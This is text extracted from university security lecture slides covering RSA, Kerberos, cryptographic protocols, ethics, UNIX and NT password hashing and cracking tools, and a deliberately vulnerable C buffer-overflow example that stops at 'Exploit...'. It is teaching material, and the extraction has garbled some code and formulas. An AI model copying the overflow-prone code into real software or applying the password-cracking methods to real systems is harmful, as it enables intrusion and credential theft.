#!/usr/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj$/=unpack(’H*’,$ );$ =‘echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1lK[d2%Sa2/d0$^Ixp"|dc‘;s/\W//g;$ =pack(’H*’,/((..)*)$/)
and then
• echo "squeamish ossifrage" | ./rsa.perl -k=10001 -n=1967cb529 > msg.rsa
• ./rsa.perl -d -k=ac363601 -n=1967cb529 < msg.rsa
CS3235 - Hugh Anderson’s notes. Page number: 369
Testing large numbers for primality
RSA requires us to generate large prime numbers, but thereis no algorithm for constructing arbitrarily large prime num-bers. Instead we use statistical testing methods to deter-mine primality.Quiz! Is 162, 259, 276, 829, 213, 363, 391, 578, 010, 288, 127prime12?After choosing a large random (odd) number p, we canquickly see if p is divisible by 2, 3 and so on (say all primesup to 1000). If our number p passes this, then we can per-form some sort of statistical primality test.
12Note that this is only a 33 digit number, and we typically use prime numbers withhundreds of digits.
CS3235 - Hugh Anderson’s notes. Page number: 370
Lehmann test
1. Choose a random number w(for witness) less than p
2. If w(p−1)/2 6≡ ±1 mod p then p is not prime
3. If w(p−1)/2 ≡ ±1 mod p then the likelihood is less than 0.5that p is not prime
Repeat the test over and over, say n times. The likelihoodof a false positive will be less than 1
2n. Other tests, such asthe Rabin-Miller test may converge more quickly.
CS3235 - Hugh Anderson’s notes. Page number: 371
Primes is in P!
Group at the Indian Institute of Technology have discov-ered the unexpected result that testing a number for pri-mality can be done in polynomial time, rather than usingprobabilistic tests as just shown.
This is unlikely to affect the effectiveness of public keysystems.
The paper is only 7 pages long and is beautifully writ-ten...
CS3235 - Hugh Anderson’s notes. Page number: 372
Case study: PGP
PGP (Pretty Good Privacy) is a public key encryptionpackage to protect E-mail and data files.
It lets you communicate securely with people you’venever met, with no secure channels needed for prior ex-change of keys.
PGP can be used to append digital signatures to mes-sages, as well as encrypt the messages, or do both.
CS3235 - Hugh Anderson’s notes. Page number: 373
Case study: PGP
It uses various schemes including patented ones likeIDEA and RSA.
The patent on IDEA allows non-commercial distribution,and the RSA patent has expired.
However there are also commercial versions of PGP.
PGP can use, for example, 2048 bit primes, and it is con-sidered unlikely that PGP with this level of encryption canbe broken.
CS3235 - Hugh Anderson’s notes. Page number: 374
Chapter 8
Lecture 8 - Protocols
CS3235 - Hugh Anderson’s notes. Page number: 375
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to and including today...
CS3235 - Hugh Anderson’s notes. Page number: 376
Last session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 377
This session
• Kerberos
• Voting
• Contract signing
CS3235 - Hugh Anderson’s notes. Page number: 378
Summary
Substitution, Vigenère, index of coincidence
DES, Feistel, modes of operation
Public key, Diffie Hellman, RSA
CS3235 - Hugh Anderson’s notes. Page number: 379
Vigenère
If our keyword was BAD, then encoding HAD A FEED wouldresult in
Key B A D B A D B A
Text H A D A F E E D
Cipher I A G B F H F D
If we can discover the length of the repeated key (in thiscase 3), and the text is long enough, we can just considerthe cipher text to be a group of interleaved monoalphabeticsubstitution ciphers and solve accordingly.
CS3235 - Hugh Anderson’s notes. Page number: 380
Analysis
The index of coincidence is the probability that two randomlychosen letters from the cipher will be the same, and it canhelp us discover the length of a key
IC =1
N(N − 1)
25∑
i=0
Fi(Fi − 1)
where Fi is the frequency of the occurences of symbol i andN is the length of the cipher.
CS3235 - Hugh Anderson’s notes. Page number: 381
DES - Feistel
+ f
+ f
+ f
+ f
+ f
+ f
K2
K1
K0
K1
K0
K2
l0 r0
l0 r0
l1 r1
l2 r2
l3 r3
l3 r3
l2 r2
l1 r1
Each of the 16 stages (rounds) of DES uses a Feistel struc-ture which encrypts a 64 bit value into another 64 bit valueusing a 48 bit key derived from the original 56 bit key.
CS3235 - Hugh Anderson’s notes. Page number: 382
DES modes of operation
DES
Ctext
msg
Electronic Code Book
DES
Ctext
msg
DES
Ctext
msg
Cipher Block Chaining
Initial vector
CS3235 - Hugh Anderson’s notes. Page number: 383
Public key systems
Public key cryptography relies on the use of encipheringfunctions which are not realistically invertible unless youhave a deciphering key.
(Plaintext)XX
P
K1 (K1[K2[P]]=P)and also(K2[K1[P]]=P)
K1[P]
K2
P
CS3235 - Hugh Anderson’s notes. Page number: 384
Authentication
K2
XP
K1
PK1[J2[P]]
J1J2
XXX
CS3235 - Hugh Anderson’s notes. Page number: 385
Diffie-Hellman key agreement
Two separated users create and share a secret key. A thirdparty is not realistically able to calculate the shared key.
g mod p
p,g
ba
p,g,a
b
Ted
BobAlicep,g,b
ag mod p
g mod pg mod p
bg mod pag mod p
CS3235 - Hugh Anderson’s notes. Page number: 386
RSA coding algorithms
The four processes needed for RSA encryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decoding messages
CS3235 - Hugh Anderson’s notes. Page number: 387
Uses of encryption
1. Generating encrypted passwords with 1-way functions
2. Checking integrity by appending digital signature
3. Checking the authenticity of a message.
4. Encrypting timestamps with messages to prevent replayattacks.
5. Exchanging a key.
CS3235 - Hugh Anderson’s notes. Page number: 388
Protocols
Systems in which the protocol plays a large part:
1. Kerberos protocol for distributing keys
2. Voting protocols
3. Contract signing protocols
These three protocols are by no means the only ones.
CS3235 - Hugh Anderson’s notes. Page number: 389
Other examples
Key distribution
Clipper
Oblivious transfer, in which two parties can complete ajoint computation, without either party revealing any un-necessary data.
CS3235 - Hugh Anderson’s notes. Page number: 390
Kerberos/Cerberus
CS3235 - Hugh Anderson’s notes. Page number: 391
Kerberos
Network authentication protocol.
Strong authentication for client/server applications usingpublic key cryptography.
Kerberos is freely available in source form
Kerberos is also available in commercial products.
Client can prove its identity to a server (and vice versa)across an insecure network connection.
CS3235 - Hugh Anderson’s notes. Page number: 392
Kerberos
After a client and server have used Kerberos to provetheir identity, they can also encrypt all of their commu-nications to assure privacy and data integrity as they goabout their business.
Must have a Key Distribution Center (KDC)
Kerberos uses Needham-Schroeder protocol.
CS3235 - Hugh Anderson’s notes. Page number: 393
Kerberos
Client
Server
(6)
(5)
KDC
(4)(3)(2)
Ticket grantingAuthentication
(1)
CS3235 - Hugh Anderson’s notes. Page number: 394
Kerberos
When a client first authenticates to Kerberos, she:
1. Talks to KDC, to get a Ticket Granting Ticket
2. Uses that to talk to the Ticket Granting Service
3. Uses the ticket, to interact with the server.
This way a user doesn’t have to reenter passwords everytime they wish to connect to a Kerberized service. If theTicket Granting Ticket is compromised, an attacker can onlymasquerade as a user until the ticket expires.
CS3235 - Hugh Anderson’s notes. Page number: 395
Kerberos protocol
Two sorts of credentials: tickets and authenticators .
A ticket Tc,s contains the client’s name and network ad-dress, the server’s name, a timestamp and a session key.This is encrypted with the server’s secret key (so that theclient is unable to modify it).
An authenticator Ac,s contains the client’s name, a times-tamp and an optional extra session key. This is encryptedwith the session key shared between the client and theserver.
CS3235 - Hugh Anderson’s notes. Page number: 396
Kerberos protocol
A key Kx,y is a session key shared by both x and y.
When we encrypt a message M using the key Kx,y wewrite it as MKx,y.
CS3235 - Hugh Anderson’s notes. Page number: 397
Kerberos protocol
Alice wants session key for communication with Bob:
• Alice sends message to Ted containing her identity, Ted’sTGS identity, and one-time value (n) : a, tgs, n.
• Ted responds with a key encrypted with Alice’s secret key(which Ted knows), and a ticket encrypted with the TGSsecret key: Ka,tgs, nKa Ta,tgsKtgs.Alice now has ticket and session key: Ta,tgsKtgs, Ka,tgs
• Alice can prove her identity to the TGS, as she has ses-sion key Ka,tgs, and Ticket Granting Ticket : Ta,tgsKtgs.
CS3235 - Hugh Anderson’s notes. Page number: 398
Kerberos protocol
Later, Alice can ask the TGS for a specific service ticket:
• When Alice wants a ticket for a specific ser-vice (say with Bob), she sends an authenticatoralong with the Ticket Granting Ticket to the TGS:Aa,bKa,tgs Ta,tgsKtgs , b, n.
• The TGS responds with a suitable key and a ticket:Ka,b, nKa,tgs Ta,bKb.
• Alice can now use an authenticator and ticket directly withBob: Aa,bKa,b Ta,bKb.
CS3235 - Hugh Anderson’s notes. Page number: 399
Weaknesses
Host security: Kerberos makes no provisions for host se-curity; it assumes that it is running on trusted hosts withan untrusted network.
KDC compromises: Kerberos uses a principal’s password(encryption key) as the fundamental proof of identity.
Salt: This is an additional input to the one-way hash algo-rithm.
CS3235 - Hugh Anderson’s notes. Page number: 400
Voting protocols
A voting protocol is one in which
• independent systems vote in a kind of election, and
• afterwards we can check that the vote was correct.
• Each voter is only allowed a single vote, and
• the system should be corruption-proof.
CS3235 - Hugh Anderson’s notes. Page number: 401
Voting protocols
Example with Alice, Bob and Charles (!), who vote and thenencrypt and sign a series of messages using public-key en-cryption. For example, if Alice votes vA, then she will broad-cast to all other voters the message
RA(RB(RC(EA(EB(EC(vA))))))
where RA is a random encoding function which adds a ran-dom string to a message before encrypting it with A’s publickey, and EA is public key encryption with A’s public key.
CS3235 - Hugh Anderson’s notes. Page number: 402
Voting protocols
Each voter then signs the message and decrypts onelevel of the encryption.
At the end of the protocol, each voter has a completesigned audit trail and is ensured of the validity of the vote.
CS3235 - Hugh Anderson’s notes. Page number: 403
Tossing a coin
Alice and Bob want to toss a coin
Alice calculates two primes p, q and calculates N = pq,sends N to Bob. N = 35 = 5 ∗ 7
If Bob can factorize the number, then Bob wins a cointoss.
Bob selects random x, and sends x2 mod N = y to Alice.y = 312 mod 35 = 16
CS3235 - Hugh Anderson’s notes. Page number: 404
Tossing a coin
Alice calculates the four square roots of 16:
• 42 mbox 35 = 16
• 312 mbox 35 = 16
• 242 mbox 35 = 16
• 112 mbox 35 = 16
This is easy for Alice, as she knows the prime factors of N .She then sends one of these back to Bob.
CS3235 - Hugh Anderson’s notes. Page number: 405
Tossing a coin
If Bob receives x or −x, then he learns nothing, but
if Bob receives either of the other values, he can add thisto x, and then find the GCD of the result with N:
GCD(24 + 31, 35) = GCD(55, 35)
= 5
Alice is unable to tell she has divulged the factor
CS3235 - Hugh Anderson’s notes. Page number: 406
Oblivious transfer
In an oblivious transfer, randomness is used to convinceparticipants of the fairness of some transaction
In a coin-tossing example, Alice knows the prime factorsof a large number, and if Bob can factorize the number,then Bob wins a coin toss.
A protocol allows Alice to either divulge one of the primefactors to Bob, or not, with equal probability.
Alice is unable to tell if she has divulged the factor, andso the coin toss is fair.
CS3235 - Hugh Anderson’s notes. Page number: 407
Contract signing
Signing contracts can be difficult.
If one party signs the contract, the other may not. Wehave one party bound by the contract, and the other not.
In addition, both may sign, and then one may say “I didn’tsign any contract!” afterwards.
CS3235 - Hugh Anderson’s notes. Page number: 408
Contract signing
Oblivious transfer used for contract-signing where
• Up to a certain point neither party is bound
• After that point both parties are bound
• Either party can prove that the other party signed
Alice and Bob exchange signed messages, agreeing to bebound by a contract with ever-increasing probability
CS3235 - Hugh Anderson’s notes. Page number: 409
Contract signing
In the event of early termination of the contract, eitherparty can take the messages they have to an adjudica-tor, who chooses a random probability value (42% say)before looking at the messages.
If both messages are over 42% then both parties arebound.
If less then both parties are free.
CS3235 - Hugh Anderson’s notes. Page number: 410
Chapter 9
Lecture 9 - System(in)security
CS3235 - Hugh Anderson’s notes. Page number: 411
Admininstration
Results are out - please check.
Assignment 1
hardcopy to tutor or me, email softcopy to me.
Assignment 2 ... better get going.
CS3235 - Hugh Anderson’s notes. Page number: 412
Last session
• Kerberos
• Voting
• Contract signing
CS3235 - Hugh Anderson’s notes. Page number: 413
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 414
Stranger danger...
One of my sons was taught stranger-danger at hisschool. We were asked to quiz him afterwards, sowe asked him if he should accept a lift in a car witha stranger. He immediately replied “No way! ”. Wethen asked: “What if he offered you sweets? ”, buthe still replied “No way! ”. Finally we asked: “Whynot? ”, to which he replied “Because you might notget any !”
CS3235 - Hugh Anderson’s notes. Page number: 415
Ethics
Moral development stages:
Stage 1: Obedience and punishment
...
Stage 6: Individual principles of conscience - an orienta-tion not only toward existing social rules, but also towardthe conscience as a directing agent, mutual trust and re-spect, and principles of moral choice involving logical uni-versalities and consistency. If one acts otherwise, self-condemnation and guilt result.
CS3235 - Hugh Anderson’s notes. Page number: 416
Ethics
It is my expectation, and requirement, that you are ableto maturely evaluate rights and wrongs.
In these sections of the course, I will be outlining systemswhich demonstrate poor cryptographic techniques, andas a result, can be defeated.
A more cynical view might be that I am teaching hacking
...this is not my intent...
CS3235 - Hugh Anderson’s notes. Page number: 417
Ethics and computing
No new ethical dilemmas... Perhaps the only significant dif-ference is that the computer crimes are so easy.
Software duplication: = theft.
Using information: = insider trading.
E-mail abuse: = abuse.
CS3235 - Hugh Anderson’s notes. Page number: 418
Network administrator’s dilemma
Network administrators often come to learn things abouttheir ’clients’
Without asking the client, they should not make use ofthat information.
The network administrator’s dilemma: How to controlbad-guys without trampling over rights.
CS3235 - Hugh Anderson’s notes. Page number: 419
Professional codes of ethics
Most professional bodies13 have formal written codes ofethics
The computer industry has yet to develop a standardcode of conduct
If computer crime continues to rise, codes may be im-posed on it.
13For example: Medical boards.
CS3235 - Hugh Anderson’s notes. Page number: 420
ACS code of ethics
1. I will serve the interests of my clients and employers, my employeesand students, and the community generally, as matters of no lesspriority than the interests of myself or my colleagues....
Within a general framework of ethical and moral responsi-bility, codes such as this one can help clarify grey areas ofconcern.
CS3235 - Hugh Anderson’s notes. Page number: 421
Insecurity - threats are real
For example:
• Pentagon machines were repeatedly corrupted by un-known intruders during the Gulf war. The intruders ap-peared to be doing it as part of a contest.
• German hackers demonstrated on TV a method of trans-ferring money into their own accounts using ActiveX con-trols downloaded to an unsuspecting person’s machine.
• Estimates of computer theft in the US range from 1 to 30$billion/year - most of which goes unreported.
CS3235 - Hugh Anderson’s notes. Page number: 422
Taxonomy of insecurity?
Each new attack adds new levels to the structure:
• physical insecurity, and
• password insecurity
Some of the security of modern systems is provided throughcryptographic techniques (particularly password storage),the subject today.
CS3235 - Hugh Anderson’s notes. Page number: 423
Non-cryptographic cracking
Misconfiguration: If excessive permissions exist on cer-tain directories and files, these can lead to gaining higherlevels of access. For example, on a UNIX system, if/dev/kmem is writable it is possible to rewrite your UIDto match root’s.
Poor SUID: Sometimes there are scripts (shell or Perl) thatperform certain tasks and run as root. If the scripts arewritable by you, you can edit it and run it.
CS3235 - Hugh Anderson’s notes. Page number: 424
Non-cryptographic cracking
Buffer overflow: Buffer overflows are typically used tospawn root shells from a (server) process running asroot.
Race conditions: A race condition is when a program cre-ates a short opportunity for attack by opening a smallwindow of vulnerability. For example, a program that al-ters a sensitive file might use a temporary backup copyof the file during its alteration.
CS3235 - Hugh Anderson’s notes. Page number: 425
Non-cryptographic cracking
Poor temporary files: Many programs create temporaryfiles while they run. If a program runs as root and is notcareful about where it puts its temporary files and whatpermissions these files have, it might be possible to uselinks to create root-owned files.
Attacks using these methods can be launched locally onthe target machine, or often remotely, by exploiting serviceswith loopholes.
CS3235 - Hugh Anderson’s notes. Page number: 426
Protection
Can you protect yourself against attacks?
• Hack/crack yourself:
• Be vigilant:
• Reduce reliance:
• Use more secure systems:
• Update systems:
Finally: “Its not the end of the world!”
CS3235 - Hugh Anderson’s notes. Page number: 427
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 428
Computer Emergency Response Team
The CERT Coordination Center is the organizationthat grew from the computer emergency responseteam formed by the Defense Advanced ResearchProjects Agency (DARPA) in November 1988 in re-sponse to the needs identified during the Internetworm incident. The CERT charter is to work with theInternet community to facilitate its response to com-puter security events involving Internet hosts, to takeproactive steps to raise the community’s awarenessof computer security issues, and to conduct researchtargeted at improving the security of existing systems.
CS3235 - Hugh Anderson’s notes. Page number: 429
CERT
If you are ever involved in a computer security incident itis useful to get in touch with CERT.
They provide incident reports and advisories, and can li-aise with other system administration people if the attackon your system comes from outside your organization.
CS3235 - Hugh Anderson’s notes. Page number: 430
CERT Incident Note IN-99-04
Here is an excerpt from an incident report:Similar Attacks Using Various RPC Services
Thursday, July 22, 1999
Overview
We have recently received an increasing number of reports that intruders are using similar methodsto compromise systems. We have seen intruders exploit three different RPC service vulnerabilities;however, similar artifacts have been found on compromised systems.
...
CS3235 - Hugh Anderson’s notes. Page number: 431
SIGINT
Signals Intelligence (SIGINT) broke the Japanese mili-tary code and learned of plans to invade Midway Island.
In 1943 they began the VENONA project to examine en-crypted Soviet diplomatic communications.
The messages were double-encrypted and were ex-tremely difficult to crack.
Almost all of the US KGB messages in 1944 and 1945were broken between 1947 and 1952.
CS3235 - Hugh Anderson’s notes. Page number: 432
NSA - National Security Agency
Successor of SIGINT
The National Security Agency is the USA’s cryptologicorganization.
It coordinates, directs, and performs highly specializedactivities to protect U.S. information systems and pro-duce foreign intelligence information.
CS3235 - Hugh Anderson’s notes. Page number: 433
NSA - National Security Agency
NSA employs the country’s premier codemakers andcodebreakers.
It is said to be the largest employer of mathematicians inthe United States and perhaps the world.
CS3235 - Hugh Anderson’s notes. Page number: 434
Rainbow documents
The NSA created various documents describing the cri-teria for evaluating the security behaviour of machines.
These criteria were published in a series of documentswith brightly coloured covers, and hence became knownas the Rainbow series. (red book, yellow book...)
CS3235 - Hugh Anderson’s notes. Page number: 435
C2 security
DOD 5200.28-STD - “Department of Defense Trusted Com-puter System Evaluation Criteria”:
• To provide a standard to manufacturers (for security fea-tures related to confidentiality)...
• To provide DoD components with a metric with which toevaluate the degree of trust...
• To provide a basis for specifying security requirements inacquisition specifications.
CS3235 - Hugh Anderson’s notes. Page number: 436
C2 security example
The TCB14 shall require users to identify themselves toit before beginning to perform any other actions that theTCB is expected to mediate.
Furthermore, the TCB shall use a protected mechanism(e.g., passwords) to authenticate the user’s identity.
14Trusted Computing Base.
CS3235 - Hugh Anderson’s notes. Page number: 437
Microsoft and C2
Windows NT Workstation vs 3.5 with U.S. Service Pack 3was the first Microsoft product that has completed C2 test-ing, and is only certified if using the same hardware, andinstalled software, and does not include any network con-nection. The NT utility c2config.exe sets up an NT systemto pass the C2 tests.
The 1998 attacks on the Pentagon involved theft and mod-ification of data, as well as denial-of-service. The attackedmachines were C2-secure Windows NT machines.
CS3235 - Hugh Anderson’s notes. Page number: 438
UNIX and C2
Many UNIX systems have also got C2 certification, andcome configured this way from the manufacturer.
There are numerous examples of hacked UNIX sys-tems found on the Internet. In 1996, a site I managedin New Zealand was the target of a malicious attack byintruders from Australia and Belgium.
Given all this, C2 certification is probably not a good guideas to the security of your system.
CS3235 - Hugh Anderson’s notes. Page number: 439
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 440
Password security
Morris and Thompson article:
http://citeseer.nj.nec.com/morris79password.html
Computer generated passwords more predictable thanuser ones...
CS3235 - Hugh Anderson’s notes. Page number: 441
UNIX password security
UNIX systems are traditionally open systems, given theirbackground in university environments.
As such, the security on them is often minimal.
It is common for UNIX accounts to be made availablerelatively freely.
For example, at the MIT Media lab15 all computers havebeen password-free until recently.
15MIT - home of Kerberos!
CS3235 - Hugh Anderson’s notes. Page number: 442
UNIX password security
UNIX systems are vulnerable to a wide range of attacks,particularly internal attacks.
All Unix systems have a root account.
This account has a UID and GID of zero, and once rootaccess is obtained on a UNIX system, there is very littlethat cannot be done.
CS3235 - Hugh Anderson’s notes. Page number: 443
UNIX accounts
Account passwords are constructed to meet the followingrequirements:
• Each password has at least six characters.
• Only the first eight characters are significant.
CS3235 - Hugh Anderson’s notes. Page number: 444
UNIX accounts
There are many other accounts found on Unix systems, notjust those for clients:
sysadm - A System V administration account, and
daemon - A daemon process account, and
uucp - The UUCP owner, and
lp - The print spooler owner.
When protecting a UNIX system, we must protect all theseaccounts - not just root.
CS3235 - Hugh Anderson’s notes. Page number: 445
UNIX password file
Account information is kept in a file called /etc/passwd.
It normally consists of seven colon-delimited fields, andmay look like the following:
hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh
CS3235 - Hugh Anderson’s notes. Page number: 446
/etc/passwd fields
hugo: The account or user name.
aAbBcJJJx23F5 5: A one-way encrypted (hashed)password
501: The UID - unique user number
100: The GID - group number for user.
Hughs Account: Account information.
/home/hugo: The account’s home directory
/bin/tcsh: A program to run when you log in
CS3235 - Hugh Anderson’s notes. Page number: 447
UNIX passwords
When you log in with your account name and password,the password is encrypted and the resulting hash is com-pared to the hash stored in the password file.
If they are equal, the system accepts that you’ve typed inthe correct password and grants you access.
CS3235 - Hugh Anderson’s notes. Page number: 448
UNIX passwords
UNIX uses a DES-like algorithm to calculate the en-crypted password.
The password is used as the DES key (eight 7-bit charac-ters make a 56 bit DES key) to encrypt a block of binaryzeroes.
The result of this encryption is the hash value.
Note: the password is not encrypted, it is the key used toperform the encryption!
CS3235 - Hugh Anderson’s notes. Page number: 449
UNIX salt
A strengthening feature of UNIX is that it introduces tworandom characters in the alogrithm (the salt).
This ensures that two equal passwords result in two dif-ferent hashes.
From viewing the UNIX password file you can not tell iftwo persons have the same password.
CS3235 - Hugh Anderson’s notes. Page number: 450
UNIX salt
To prevent crackers from simply encrypting an entiredictionary and then looking up the hash, the salt wasadded to the algorithm to create a possible 4096 differenthashes for a particular password.
This lengthens the cracking time because it becomes alittle harder to store an encrypted dictionary online as theencrypted dictionary now would have to take up 4096times the disk space.
This does not make password cracking harder, just moretime consuming.
CS3235 - Hugh Anderson’s notes. Page number: 451
Crypt code
Sample crypt code from LINUX uClibc. The code has thefollowing structure:
extern char * crypt(const char *key, const char *salt) /* Are we supposed to be using the MD5 replacement/* instead of DES... */
if (salt[0]==’$’ && salt[1]==’1’ && salt[2]==’$’)return md5 crypt(key, salt);
elsereturn des crypt(key, salt);
CS3235 - Hugh Anderson’s notes. Page number: 452
Cracking
It is very time consuming, but given enough time, bruteforce cracking will get the password.
The hashed passwords are compared with the entry inthe /etc/passwd file.
BTW - You cannot try to log in using all the possible pass-words, as UNIX systems enforce 10 second timeouts af-ter three consecutive login failures.
CS3235 - Hugh Anderson’s notes. Page number: 453
Dictionary cracking
Dictionary password cracking is the most popularmethod for cracking Unix passwords.
The cracking program will take a word list, and one at atime try to crack one or all of the passwords listed in thepassword file.
Some password crackers will filter and/or mutate:
substitute numbers for certain letters, add prefixes or suffixes, or switch case or order of letters.
CS3235 - Hugh Anderson’s notes. Page number: 454
Dictionary cracking
A popular cracking utility is called Crack .
Crack can use user-definable rules for word manipula-tion/mutation to maximize dictionary effectiveness.
Crack merges dictionaries, turns the password files intoa sorted list, and generates lists of possible passwordsfrom the merged dictionary or from information gleanedabout users from the password file.
CS3235 - Hugh Anderson’s notes. Page number: 455
/etc/shadow passwords
Once the password hashes are moved to the shadow file,its permissions are changed as follows:
opo 35# ls -l /etc/shadow-r-------- 1 root sys 3429 Aug 20 14:46 /etc/shadow
opo 36#
These permissions ensure that ordinary users are unable tolook at the password hashes, and hence are unable to trydictionary attacks.
CS3235 - Hugh Anderson’s notes. Page number: 456
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 457
Microsoft password security
Two one-way password hashes are stored on NT systems:
• a LanManager hash, and
• a Windows NT hash.
The LanManager hash supports the older LanManager pro-tocol originally used in Windows and OS/2. In an all-NT en-vironment it is desirable to turn off LanManager passwords,as it is easier to crack. The NT method uses a strongeralgorithm and allows mixed-cased passwords.
CS3235 - Hugh Anderson’s notes. Page number: 458
Microsoft password security
The database containing these hashes on an NT systemis called the SAM (Security Access Manager)
If you have administrative access16, the program pw-dump can extract the hashes.
16Originally, anyone could extract the hashed passwords from the SAM, as Microsoftbelieved that “if they didn’t tell anyone the algorithms they used, no-one could discoverwhat they had done”. Security through obscurity is not a safe strategy, and JeremyAllison was able to de-obfuscate the SAM entries relatively quickly.
CS3235 - Hugh Anderson’s notes. Page number: 459
Microsoft salt
Microsoft does not salt during hash generation, so oncea potential password has generated a hash it can bechecked against all accounts.
The cracking software takes advantage of this.
CS3235 - Hugh Anderson’s notes. Page number: 460
LanManager encryption
LanManager encryption is created by taking the user’splaintext password, capitalising it, and either truncatingto 14 bytes, or padding to 14 bytes with null bytes.
This 14 byte value is used as two 56-bit DES keys to en-crypt an eight byte value, forming a 16 byte value whichis stored by the server and client.
This value is known as the hashed password .
CS3235 - Hugh Anderson’s notes. Page number: 461
NT encryption
Windows NT encryption is a higher quality mechanism,consisting of doing an MD4 hash on a Unicode version ofthe user’s password.
This also produces a 16 byte hash value that is non-reversible.
CS3235 - Hugh Anderson’s notes. Page number: 462
NT Password security
Note that the LANManager hash is similar to UNIX levelof cyptography
The NT hash is better
But... neither use strong encryption, and
the network login mechanism has some problems.
CS3235 - Hugh Anderson’s notes. Page number: 463
Challenge response
BAD GUY!
PDCCLIENT
Snooping!
Login network traffic
CS3235 - Hugh Anderson’s notes. Page number: 464
Challenge-response protocol
When a client wishes to use a resource, it first requestsa connection and negotiates the protocol that the clientand server will use.
In the reply to this request the server generates and ap-pends an 8 byte, random value - this is stored in theserver after the reply is sent and is known as the chal-lenge .
It is different for every client connection.
CS3235 - Hugh Anderson’s notes. Page number: 465
Challenge-response protocol
The client then uses the hashed password (16 byte val-ues described above), appended with 5 null bytes, asthree 56 bit DES keys, each of which is used to en-crypt the challenge 8 byte value, forming a 24 byte valueknown as the response .
This calculation is done on both hashes of the user’spassword, and both responses are returned to the server,giving two 24 byte values.
CS3235 - Hugh Anderson’s notes. Page number: 466
Challenge-response protocol
The server then reproduces the above calculation, us-ing its own value of the 16 byte hashed password andthe challenge value that it kept during the initial protocolnegotiation.
It then checks to see if the 24 byte value it calculatesmatches the 24 byte value returned to it from the client.
If these values match exactly, then the client knew thecorrect password and is allowed access.
CS3235 - Hugh Anderson’s notes. Page number: 467
Challenge-response protocol
There are good points about this:
• The server never knows or stores the cleartext of theusers password - just the 16 byte hashed values derivedfrom it.
• The cleartext password or 16 byte hashed values arenever transmitted over the network - thus increasing se-curity.
CS3235 - Hugh Anderson’s notes. Page number: 468
Challenge-response protocol
However, there is also a bad side:
• The 16 byte hashed values are a "password equivalent".You cannot derive the users password from them, butthey can be used in a modified client to gain access toa server.
• The initial protocol negotiation is generally insecure, andcan be hijacked in a range of ways. One common hijackinvolves convincing the server to allow clear-text pass-words.
CS3235 - Hugh Anderson’s notes. Page number: 469
Challenge-response protocol
Despite functionality added to NT to protect unauthorizedaccess to the SAM, the mechanism is trivially insecure
Both the hashed values can be retrieved using the net-work sniffer mentioned before, and they are as-good-aspasswords.
CS3235 - Hugh Anderson’s notes. Page number: 470
Attack
Relies on flawed mechanism.
Even without network access, it is possible by variousmeans to access the SAM password hashes, and withnetwork access it is easy.
The hashed values are password equivalents, and maybe used directly if you have modified client software.
The attack considered here is the use of either a dic-tionary, or brute force attack directly on the passwordhashes (which must be first collected somehow).
CS3235 - Hugh Anderson’s notes. Page number: 471
Attack
L0phtCrack is a tool for turning Microsoft Lan Manager andNT password hashes back into the original clear text pass-words. It may be configured to run in different ways.
Dictionary cracking: L0phtCrack running on a PentiumPro 200 checked a password file with 100 passwordsagainst a 8 Megabyte (about 1,000,000 word) dictionaryfile in under one minute.
Brute force: L0phtCrack running on a Pentium Pro 200checked a password file with 10 passwords using the al-pha character set (A-Z) in 26 hours.
CS3235 - Hugh Anderson’s notes. Page number: 472
Attack time
Character set size Size of computation Relative time taken
26 8.353 ∗ 109 1.00
36 8.060 ∗ 1010 9.65
46 4.455 ∗ 1011 53.33
68 6.823 ∗ 1012 816.86
So if 26 characters takes 26 hours to complete, a worst-case scenario for 36 characters (A-Z,0-9) would take 250hours or 10.5 days. A password such as take2asp1r1nwould probably be computed in about 7 days.
CS3235 - Hugh Anderson’s notes. Page number: 473
Microsoft base security fix
1. Disable the use of LanManager passwords.
2. Don’t log in over network as administrator
3. Encrypt all network traffic
4. Use long passwords, and all allowable characters
5. Use an alternative login system
6. Use an unsniffable network cabling system.
CS3235 - Hugh Anderson’s notes. Page number: 474
Chapter 10
Lecture 10 - More(in)security
CS3235 - Hugh Anderson’s notes. Page number: 475
Last session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 476
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 477
Buffer overflow
Most well known compromise of computer systems
One of a general class of problems caused by
software that does not check its parameters for ex-treme values.
CS3235 - Hugh Anderson’s notes. Page number: 478
Buffer overflow
Examine the way programs use memory.
Presentation based on
http://destroy.net/machines/security/P49-14-Aleph-One
CS3235 - Hugh Anderson’s notes. Page number: 479
Simple Program
void main (int argc, char *argv[]) char buffer[512]; printf ("Argument is %s\n", argv[1]); strcpy (buffer, argv[1]);
CODE LISTING vulnerable.c
CS3235 - Hugh Anderson’s notes. Page number: 480
Simple Program
When we run it:
[hugh@pnp176-44 programs]$ ./vulnerable testArgument is test[hugh@pnp176-44 programs]$ ./vulnerable “A Longer Test”Argument is A Longer Test[hugh@pnp176-44 programs]$
CS3235 - Hugh Anderson’s notes. Page number: 481
Simple program
Stack
Stack grows down...
Return address
Buffer (512 bytes)
Computer’s Memory
ArgumentsVariables
CS3235 - Hugh Anderson’s notes. Page number: 482
Smashing the stack!
Stack
Stack grows down...
Return address
Computer’s Memory
ArgumentsVariables
CS3235 - Hugh Anderson’s notes. Page number: 483
Working and not working!
[hugh@pnp176-44 programs]$ ./vulnerable ddddd
CS3235 - Hugh Anderson’s notes. Page number: 484
Exploit...
